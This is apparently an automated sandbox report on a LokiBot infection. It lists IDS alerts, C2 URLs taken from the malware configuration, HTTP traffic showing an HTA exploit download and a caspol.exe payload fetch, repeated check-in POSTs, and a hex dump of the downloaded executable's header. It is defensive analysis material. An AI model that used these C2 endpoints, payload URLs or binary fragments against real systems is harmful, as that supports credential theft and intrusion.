Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49204 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49204 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49199
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49201 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49201 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49204 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49204 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49181
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49201
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49204
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49205
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49184 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49184 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49184 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49197 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49197 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49197 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49184 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49184 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49197 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49184
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49197 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49194
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49208 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49208 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49208 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49197
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49208 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49208 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49186 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49186 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49186 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49208
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.22:49202 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.22:49202 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49186 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.22:49202 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49186 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49186
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.22:49202 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.22:49202 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.22:49202

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor	URLs: 94.156.177.41/simple/five/fre.php

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 21 Nov 2024 00:20:46 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30Last-Modified: Wed, 20 Nov 2024 01:04:28 GMTETag: "92a00-6274dbb521496"Accept-Ranges: bytesContent-Length: 600576Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9c 35 3d 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 08 09 00 00 20 00 00 00 00 00 00 2e 27 09 00 00 20 00 00 00 40 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 09 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 dc 26 09 00 4f 00 00 00 00 40 09 00 7c 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 07 09 00 00 20 00 00 00 08 09 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 7c 1d 00 00 00 40 09 00 00 1e 00 00 00 0a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 09 00 00 02 00 00 00 28 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 27 09 00 00 00 00 00 48 00 00 00 02 00 05 00 a8 36 00 00 0c 28 00 00 03 00 00 00 16 00 00 06 b4 5e 00 00 28 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c2 02 28 14 00 00 0a 02 03 7d 01 00 00 04 02 7b 01 00 00 04 72 01 00 00 70 20 d1 01 00 00 17 6f 35 00 00 06 02 7b 01 00 00 04 6f 37 00 00 06 26 2a 00 00 00 1b 30 03 00 1f 00 00 00 01 00 00 11 02 7b 01 00 00 04 03 04 6f 39 00 00 06 02 03 7d 02 00 00 04 17 0a de 05 26 16 0a de 00 06 2a 00 01 10 00 00 00 00 00 00 18 18 00 05 0a 00 00 02 1b 30 03 00 74 00 00 00 02 00 00 11 05 6f 15 00 00 0a 02 7b 01 00 00 04 02 7b 02 00 00 04 72 1f 00 00 70 28 16 00 00 0a 6f 3a 00 00 06 03 0a 16 0b 2b 25 06 07 9a 0c 02 7b 01 00 00 04 08 6f 17 00 00 0a 6f 3b 00 00 06 05 08 6f 18 00 00 0a de 03 26 de 00 07 17 58 0b 07 06 8e 69 32 d5 02 7b 01 00 00 04 04 6f 3c 00 00 06 17 0d de 10 26 02 7b 01 00 00 04 6f 3d 00 00 06 16 0d de 00 09 2a 01 1c 00 00 00 00 2b 00 1a 45 00 03 0a 00 00 02 00 00 06 00 5c 62 00 10 0a 00 00 02 32 02 7b 01 00 00 04 6f 41 00 00 06 2a 6e 02 28 19 00 00 0a 02 03 7d 03 00 00 04 02

Source: Joe Sandbox View	IP Address: 198.244.140.41 198.244.140.41
Source: Joe Sandbox View	IP Address: 192.3.243.136 192.3.243.136
Source: Joe Sandbox View	IP Address: 94.156.177.41 94.156.177.41

Source: Joe Sandbox View	ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View	ASN Name: NET1-ASBG NET1-ASBG

Source: Joe Sandbox View

JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: Network traffic	Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49162 -> 192.3.243.136:80
Source: Network traffic	Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 192.3.243.136:80
Source: Network traffic	Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49171 -> 192.3.243.136:80

Source: global traffic	HTTP traffic detected: GET /CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: provit.ukConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: provit.ukConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: provit.ukConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /CxdOH5?&radar=sneaky&psychology=outstanding&sherry=spotless&suggestion HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: provit.ukConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.243.136Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 192.3.243.136If-Range: "2c850-6274dfb369376"
Source: global traffic	HTTP traffic detected: GET /55/caspol.exe HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.243.136Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 176Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: GET /xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Wed, 20 Nov 2024 01:22:20 GMTConnection: Keep-AliveHost: 192.3.243.136If-None-Match: "2c850-6274dfb369376"
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close
Source: global traffic	HTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A6A8C306Content-Length: 149Connection: close

Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.243.136
